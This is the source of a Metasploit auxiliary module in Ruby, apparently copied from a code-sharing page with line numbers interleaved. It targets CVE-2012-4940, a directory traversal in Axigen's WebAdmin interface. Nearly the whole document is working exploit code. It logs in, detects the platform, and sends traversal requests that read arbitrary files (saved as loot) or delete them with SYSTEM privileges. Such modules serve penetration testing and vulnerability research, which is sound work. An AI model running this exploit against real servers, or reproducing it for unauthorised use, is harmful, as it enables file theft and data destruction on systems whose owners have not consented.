Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Axigen Arbitrary File Read and Delete',
14
        'Description' => %q{
15
          This module exploits a directory traversal vulnerability in the WebAdmin
16
          interface of Axigen, which allows an authenticated user to read and delete
17
          arbitrary files with SYSTEM privileges. The vulnerability is known to work on
18
          Windows platforms. This module has been tested successfully on Axigen 8.10 over
19
          Windows 2003 SP2.
20
        },
21
        'Author' => [
22
          'Zhao Liang', # Vulnerability discovery
23
          'juan vazquez' # Metasploit module
24
        ],
25
        'License' => MSF_LICENSE,
26
        'References' => [
27
          [ 'US-CERT-VU', '586556' ],
28
          [ 'CVE', '2012-4940' ],
29
          [ 'OSVDB', '86802' ]
30
        ],
31
        'Actions' => [
32
          ['Read', { 'Description' => 'Read remote file' }],
33
          ['Delete', { 'Description' => 'Delete remote file' }]
34
        ],
35
        'DefaultAction' => 'Read',
36
        'DisclosureDate' => '2012-10-31'
37
      )
38
    )
39

40
    register_options(
41
      [
42
        Opt::RPORT(9000),
43
        OptInt.new('DEPTH', [ true, 'Traversal depth if absolute is set to false', 4 ]),
44
        OptString.new('TARGETURI', [ true, 'Path to Axigen WebAdmin', '/' ]),
45
        OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
46
        OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
47
        OptString.new('PATH', [ true, 'The file to read or delete', '\\windows\\win.ini' ])
48
      ]
49
    )
50
  end
51

52
  def run
53
    print_status('Trying to login')
54
    if login
55
      print_good('Login Successful')
56
    else
57
      print_error('Login failed, review USERNAME and PASSWORD options')
58
      return
59
    end
60

61
    @traversal = '../' * 10
62
    file = datastore['PATH']
63
    @platform = get_platform
64

65
    if @platform == 'windows'
66
      @traversal.gsub!(%r{/}, '\\')
67
      file.gsub!(%r{/}, '\\')
68
    else # unix
69
      print_error('*nix platform detected, vulnerability is only known to work on Windows')
70
      return
71
    end
72

73
    case action.name
74
    when 'Read'
75
      read_file(datastore['PATH'])
76
    when 'Delete'
77
      delete_file(datastore['PATH'])
78
    end
79
  end
80

81
  def read_file(file)
82
    print_status('Retrieving file contents...')
83

84
    res = send_request_cgi(
85
      {
86
        'uri' => normalize_uri(target_uri.path, 'sources', 'logging', 'page_log_file_content.hsp'),
87
        'method' => 'GET',
88
        'cookie' => "_hadmin=#{@session}",
89
        'vars_get' => {
90
          '_h' => @token,
91
          'fileName' => "#{@traversal}#{file}"
92
        }
93
      }
94
    )
95

96
    if res && (res.code == 200) && res.headers['Content-Type'] && !res.body.empty?
97
      store_path = store_loot('axigen.webadmin.data', 'application/octet-stream', rhost, res.body, file)
98
      print_good("File successfully retrieved and saved on #{store_path}")
99
    else
100
      print_error('Failed to retrieve file')
101
    end
102
  end
103

104
  def delete_file(file)
105
    print_status("Deleting file #{file}")
106

107
    res = send_request_cgi(
108
      {
109
        'uri' => normalize_uri(target_uri.path),
110
        'method' => 'GET',
111
        'cookie' => "_hadmin=#{@session}",
112
        'vars_get' => {
113
          '_h' => @token,
114
          'page' => 'vlf',
115
          'action' => 'delete',
116
          'fileName' => "#{@traversal}#{file}"
117
        }
118
      }
119
    )
120

121
    if res && (res.code == 200) && res.body =~ (/View Log Files/)
122
      print_good("File #{file} deleted")
123
    else
124
      print_error("Error deleting file #{file}")
125
    end
126
  end
127

128
  def get_platform
129
    print_status('Retrieving platform')
130

131
    res = send_request_cgi(
132
      {
133
        'uri' => normalize_uri(target_uri.path),
134
        'method' => 'GET',
135
        'cookie' => "_hadmin=#{@session}",
136
        'vars_get' => {
137
          '_h' => @token
138
        }
139
      }
140
    )
141

142
    if res && (res.code == 200)
143
      if res.body =~ /Windows/
144
        print_good('Windows platform found')
145
        return 'windows'
146
      elsif res.body =~ /Linux/
147
        print_good('Linux platform found')
148
        return 'unix'
149
      end
150
    end
151

152
    print_warning('Platform not found, assuming UNIX flavor')
153
    return 'unix'
154
  end
155

156
  def login
157
    res = send_request_cgi(
158
      {
159
        'uri' => normalize_uri(target_uri.path),
160
        'method' => 'POST',
161
        'vars_post' => {
162
          'username' => datastore['USERNAME'],
163
          'password' => datastore['PASSWORD'],
164
          'submit' => 'Login',
165
          'action' => 'login'
166
        }
167
      }
168
    )
169

170
    if res && (res.code == 303) && res.headers['Location'] =~ (/_h=([a-f0-9]*)/)
171
      @token = ::Regexp.last_match(1)
172
      if res.get_cookies =~ /_hadmin=([a-f0-9]*)/
173
        @session = ::Regexp.last_match(1)
174
        return true
175
      end
176
    end
177

178
    return false
179
  end
180
end
181

182